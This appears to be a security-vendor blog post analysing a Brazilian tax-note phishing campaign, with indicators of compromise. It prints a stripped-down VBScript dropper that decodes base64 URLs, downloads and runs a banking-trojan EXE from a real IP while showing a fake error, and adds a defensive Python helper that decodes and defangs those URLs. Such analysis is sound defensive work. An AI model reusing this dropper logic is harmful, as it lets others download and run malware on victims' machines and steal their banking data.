It’s a Small World After All

The other day I decided to take a walkabout in our data and explore what the rest of the world sees. It didn’t take long to find a poorly constructed Brazilian tax note phish spoofing Brazil’s Ministry of Economy. The actor fumbled the phish template, switching between an invoice phish and a tax note phish.

As you have probably guessed, that link does not go to the Ministry of Economy, nor is it an electronic tax note. In fact, it downloads a ZIP file containing a VBScript. The script is minimally obfuscated and rather simple, so I will only provide a stripped-down version.

' Stripped-down VBScript dropper; variable names are as they appear in the sample
Set objShellSW = CreateObject( "WScript.Shell" )
noqrtvvwyyABBDEEGIJ = objShellSW.ExpandEnvironmentStrings("%APPDATA%")
Set wshShell = CreateObject("WScript.Shell")
' Working directory under %APPDATA%
BBDEGIIJLNNOQQRTTV = noqrtvvwyyABBDEEGIJ + "\realteknv"
' Decoy error dialog shown to the victim
msgbox "   FILE  NOT  FOUND    "  ,vbInformation,"Windows"
Dim oFSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
' (1) and (2): base64-encoded URLs, decoded at run time
Zbccgghjjlmmoqrrtu = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9ncmwv")
uuwyzBBDEGGHJJLMO = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9iYzUyNzllOC0zNGFjLTRkMTYtYThmMi1iOWJkOTA0NDhhMC56aXA")
' Extract the downloaded ZIP via Shell.Application CopyHere (flag 4 = no progress dialog)
Set fso = CreateObject("Scripting.FileSystemObject")
sourceFile = fso.GetAbsolutePathName(ZipFile)
destFolder = fso.GetAbsolutePathName(ExtractTo)
Set objShell = CreateObject("Shell.Application")
Set FilesInZip = objShell.NameSpace(sourceFile).Items()
objShell.NameSpace(destFolder).copyHere FilesInZip, 4
Set objFSOx = CreateObject("Scripting.FileSystemObject")
If objFSOx.FileExists(BBDEGIIJLNNOQQRTTV & "\") Then objFSOx.DeleteFile BBDEGIIJLNNOQQRTTV & "\"
' Locate the extracted EXE and build its extension-less name and full path
Set objFSOw = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSOw.GetFolder(objStartFolder)
Set colFiles = objFolder.Files
Dim objShellLM
Set objShellLM = WScript.CreateObject( "WScript.Shell" )
For Each objFile in colFiles
    If UCase(objFSOw.GetExtensionName(objFile.Name)) = "EXE" Then
        wyABDFFGIIJLNNOQQST = Replace(objFile.Name, ".exe", "")
        ffgiklnnpqsstvvxy = BBDEGIIJLNNOQQRTTV & "\" & objFile.Name
    End If
' Synchronous HTTP GET to one of the decoded URLs
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.Open "GET", Zbccgghjjlmmoqrrtu, False

The script starts by base64-decoding those two strings, which decode to (1) hxxp://3.81.170[.]195/grl/ and (2) hxxp://3.81.170[.]195/. Then it downloads the payload from (1), extracts the EXE from the ZIP archive, removes the extension, and executes the payload. Finally, it sends a GET request to (2).
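The decoding step above is the kind of thing an analyst repeats on every sample of this family, so here is a small triage helper, added here and not part of the original post: it pulls base64-looking string literals out of a VBScript, decodes the ones that turn out to be URLs (tolerating the dropped padding seen in the second literal), and defangs them in the hxxp / [.] style used in this write-up. The sample script text is constructed from the two literals shown above; the regex heuristics are my own assumptions, not a general deobfuscator.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample: the two base64 literals from the stripped-down script above,
# wrapped in the same base64_decode("...") call the script uses.
SAMPLE_VBS = '''
Zbccgghjjlmmoqrrtu = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9ncmwv")
uuwyzBBDEGGHJJLMO = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9iYzUyNzllOC0zNGFjLTRkMTYtYThmMi1iOWJkOTA0NDhhMC56aXA")
msgbox "   FILE  NOT  FOUND    "  ,vbInformation,"Windows"
'''

_B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')  # quoted, base64-alphabet only
_ASSIGN = re.compile(r'^\s*(\w+)\s*=')                      # "name = ..." at line start
_URL = re.compile(r'^https?://', re.IGNORECASE)

def decode_b64_lenient(token: str) -> Optional[str]:
    """Decode base64, tolerating the dropped '=' padding seen in the script; None if not text."""
    padded = token + "=" * (-len(token) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None

def defang(url: str) -> str:
    """Make a URL unclickable in the style used above: http -> hxxp, last host dot -> [.]."""
    scheme, rest = url.split("://", 1)
    host, slash, path = rest.partition("/")
    dot = host.rfind(".")
    if dot >= 0:
        host = host[:dot] + "[.]" + host[dot + 1:]
    return scheme.replace("tt", "xx") + "://" + host + slash + path

def extract_encoded_urls(script_text: str) -> list:
    """One record per base64 literal that decodes to a URL, tagged with the variable it fills."""
    found = []
    for line in script_text.splitlines():
        assign = _ASSIGN.match(line)
        for literal in _B64_LITERAL.findall(line):
            decoded = decode_b64_lenient(literal)
            if decoded and _URL.match(decoded):
                found.append({"var": assign.group(1) if assign else None, "literal": literal,
                              "url": decoded, "defanged": defang(decoded)})
    return found

if __name__ == "__main__":
    for rec in extract_encoded_urls(SAMPLE_VBS):
        print(f"{rec['var']} -> {rec['defanged']}")
```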

And what sort of goodness does that payload deliver? Well, it is a Brazilian phish, so you would be correct if you said a generic Delphi-based Brazilian banking trojan. Many anti-virus vendors label them Banload, Boleto, or Delf.

IOC                                                                Type        Notes
                                                                   IP Address  C2 Address
dcd9ce1d719c4c7f3a06aaf320dd57f20fd9c228f21d56b118b1d28a726eecae   SHA256      Zip file
1085cc04386f819f56f56ce15f63bff09336b44785ab93e7f75c073282c07e6c   SHA256      Banking trojan


All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.